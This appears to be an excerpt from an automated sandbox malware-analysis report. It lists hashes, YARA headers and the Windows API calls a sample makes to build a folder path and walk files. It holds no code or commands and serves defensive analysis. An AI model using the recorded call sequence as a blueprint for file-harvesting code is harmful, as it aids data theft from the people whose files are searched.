                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 56de016301ca9677f038b97fa7ea0548783fe265edf95e4b9c4e951dd0888db0
                                • Instruction ID: c1378bcf0ee1c27e4fb36f779a32a548cf433f0aace2bcc17b87d3f3312c1b0c
                                • Opcode Fuzzy Hash: 56de016301ca9677f038b97fa7ea0548783fe265edf95e4b9c4e951dd0888db0
                                • Instruction Fuzzy Hash: 9FF0F032A00306DBDB20BBB8884274E33E0EF00764F35214BF014BA3D2EB245943CE46
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4F7A
                                • lstrcat.KERNEL32(?,00EE1070), ref: 00ED4F97
                                • lstrcat.KERNEL32(?,00DA9148), ref: 00ED4FAB
                                • lstrcat.KERNEL32(?,00EE1074), ref: 00ED4FBD
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED492C
                                  • Part of subcall function 00ED4910: FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                  • Part of subcall function 00ED4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                  • Part of subcall function 00ED4910: FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: d24e9aad3adb657adce81a7ee1766aa3689c6754f4a9175497075c857b4ae367
                                • Instruction ID: dcc3ed6400791c93ddd1efa1bad57188a0f5785c03382146193312756c73b575
                                • Opcode Fuzzy Hash: d24e9aad3adb657adce81a7ee1766aa3689c6754f4a9175497075c857b4ae367
                                • Instruction Fuzzy Hash: 6021B8B6D0030867C768F760EC46EED337CAB54300F0055A9B659A3185EEB597C98B91